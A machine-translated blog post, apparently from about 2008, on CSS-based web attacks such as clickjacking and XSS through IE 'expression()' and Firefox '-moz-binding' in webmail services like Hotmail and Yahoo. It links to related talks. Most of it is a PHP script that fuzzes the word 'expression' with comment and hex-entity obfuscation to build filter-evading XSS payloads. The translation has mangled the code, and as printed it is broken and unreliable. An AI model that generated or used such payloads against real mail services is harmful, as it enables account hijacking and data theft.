Since the birth of the concept of Web security, the trend is becoming more and more evil and cumbersome, from csrf to today's clickjacking. can prove this. clickjacking is actually a trivial application of CSS Overlays. This kind of technique should be used by excellent web designers. However, after the evil thinking of security personnel, the famous clickjacking came into being.
We have made some comments on the security issues brought about by css at home and abroad. For more information, see.David Lindsay, Gareth Heyes, Eduardo Vela Nava[Sdc] Three People's speech at bluehat8:
Http://www.thespanner.co.uk/wp-content/uploads/2008/10/the_sexy_assassin2ppt.zip
Exp in pp: http://p42.us/css/ and sdc and garethheyes blog have some want to close the introduction:
Html ">Http://sirdarckcat.blogspot.com/2008/10/about-css-attacks.html
Http://www.thespanner.co.uk/2008/10/20/bluehat/
I want to study css more deeply in css because of the intervention of * A in China than that of foreigners. The xss of hotmail yahoo is centered on the expressions in css, the main reason is that expression has good support for ie6 and ie7, and we can use-moz-binding to implement xss for ff2 in css. therefore, the xss in the style Label [css] is still the main way to search for mail xss.
If you have analyzed the poc of yahoo and other exposure, you will find that the code is strange. I think it may be through a lot of tests and fuzz. so I also learned to write a simple script [This is too simple, so I didn't find anything :(].
<? Php
// Xss fuzzing
//Www.80vul.com
// Some from Gareth Heyes s codz :) thx
$ String = "expression ";
$ Strinj = "/* google */";
// $ Strinj = str_replace (/, stringToHexString (/, dec), $ strinj );
$ Strinj = str_replace (/*,/. stringToHexString (*, dec), $ strinj );
// $ Strinj = stringToHexString ("/*} */", dec );
$ Arr = array ();
For ($ I = 0, $ len = strlen ($ string); $ I <$ len; $ I ++)
{
$ Stringarr [$ I] = substr ($ string, $ I, 1 );
$ Destring = substr ($ string, 0, $ I). $ strinj. substr ($ string, $ I, strlen ($ string ));
// Print $ destring. "<br> ";
Array_push ($ arr, $ destring );
}
Array_push ($ arr, implode ($ strinj, $ stringarr ));
// Print_r ($ arr );
// Print implode ($ strinj, $ stringarr );
Foreach ($ arr as $ I =>$ value ){
// Print ($ arr [$ I]. "<br> ");
// $ Xss = <span style = "width :. $ arr [$ I]. (alert (. $ I .)); "> Hello. $ I. </SPAN>;
// $ Xss = <div id = "yiv277018259"> <div style = "width :. $ arr [$ I]. (alert (. $ I .)); "> </div>;
$ Xss = hihihihihihi <style> div {background-image:. $ arr [$ I]. (alert (. $ I.) ;}</style>;
$ File = fopen ("xsslog.txt", "a + ");
Fputs ($ file, "$ xss ");
Fclose ($ file );
}
Function stringToHexString ($ str, $ type ){
$ Tmp =;
// $ Rand = rand (1,100 );
For ($ I = 0, $ len = strlen ($ str); $ I <$ len; $ I ++)
{
$ Ord = Ord ($ str [$ I]);
If ($ type = dec) {$ tmp. = "& # x00". base_convert ($ ord, 10, 16 ).";";}
If ($ type = hex) {$ tmp. = "& # x". base_convert ($ ord, 10, 16 ).";";}
}
Return $ tmp;
}
?>
A few links related to css are attached:
Http://nb.io/hacks/csshttprequest/
Http://hi.baidu.com/ycosxhack/blog/item/62ad7c082e74f3930b7b8242.html
From: http://hi.baidu.com/hi_heige/blog/item/aff71d25097f2c35c9955940.html